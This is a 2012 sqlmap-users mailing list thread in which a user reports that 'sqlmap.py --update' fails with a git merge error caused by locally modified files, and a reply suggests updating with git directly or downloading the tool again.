Have you (or a program) modified sqlmap's files? Try to update it with git directly or just redownload the whole thing.
On Thu, Nov 8, 2012 at 5:31 AM, root <ro...@cn...> wrote:
hi,all
i don't konw this error why?
sqlmap.py --update
[12:26:00] [INFO] updating sqlmap to the latest development version from the Git
Hub repository
[12:26:00] [INFO] update in progress ....
[12:26:04] [ERROR] update could not be completed ('From git github com sqlmappro
ject sqlmap branch HEAD FETCH_HEAD error Your local changes to the following fil
es would be overwritten by merge _sqlmap py doc THANKS md lib controller checks
py lib controller controller py lib core agent py lib core common py lib core co
nvert py lib core enums py lib core option py lib core settings py lib core targ
et py lib core wordlist py lib parse cmdline py lib request basic py lib request
connect py lib request inject py lib takeover icmpsh py lib takeover metasploit
py lib takeover udf py lib takeover web py lib takeover xp_cmdshell py lib tech
niques blind inference py lib techniques union test py lib techniques union use
py lib utils checkpayload py lib utils crawler py lib utils google py lib utils
hash py lib utils pivotdumptable py plugins dbms access connector py plugins dbm
s access enumeration py plugins dbms db2 connector py plugins dbms firebird conn
ector py plugins dbms firebird enumeration py plugins dbms mssqlserver connector
py plugins dbms mssqlserver enumeration py plugins dbms mssqlserver filesystem
py plugins dbms mysql connector py plugins dbms oracle connector py plugins dbms
oracle enumeration py plugins dbms postgresql enumeration py plugins dbms postg
resql syntax py plugins dbms sqlite connector py plugins dbms sqlite enumeration
py plugins dbms sybase connector py plugins generic databases py plugins generi
c entries py plugins generic misc py plugins generic search py plugins generic u
sers py procs mysql write_file_limit sql sqlmap conf tamper apostrophemask py ta
mper apostrophenullencode py tamper appendnullbyte py tamper base64encode py tam
per between py tamper chardoubleencode py tamper charencode py tamper charunicod
eencode py tamper equaltolike py tamper halfversionedmorekeywords py tamper ifnu
ll2ifisnull py tamper modsecurityversioned py tamper modsecurityzeroversioned py
tamper multiplespaces py tamper nonrecursivereplacement py tamper percentage py
tamper randomcase py tamper randomcomments py tamper securesphere py tamper sp_
password py tamper space2comment py tamper space2dash py tamper space2hash py ta
mper space2morehash py tamper space2mssqlblank py tamper space2mssqlhash py tamp
er space2mysqlblank py tamper space2mysqldash py tamper space2plus py tamper spa
ce2randomblank py tamper unionalltounion py tamper unmagicquotes py tamper versi
onedkeywords py tamper versionedmorekeywords py thirdparty multipart multipartpo
st py xml queries xml Please commit your changes or stash them before you can me
rge Aborting')
[12:26:04] [INFO] for Windows platform it's recommended to use a GitHub for Wind
ows client for updating purposes (http://windows.github.com/) or just download t
he latest snapshot from https://github.com/sqlmapproject/sqlmap/downloads
thanks&Best Regards
------------------------------------------------------------------------------
Everyone hates slow websites. So do we.
Make your web apps faster with AppDynamics
Download AppDynamics Lite for free today:
http://p.sf.net/sfu/appdyn_d2d_nov
_______________________________________________
sqlmap-users mailing list
sql...@li...
https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
48 messages has been excluded from this view by a project administrator.
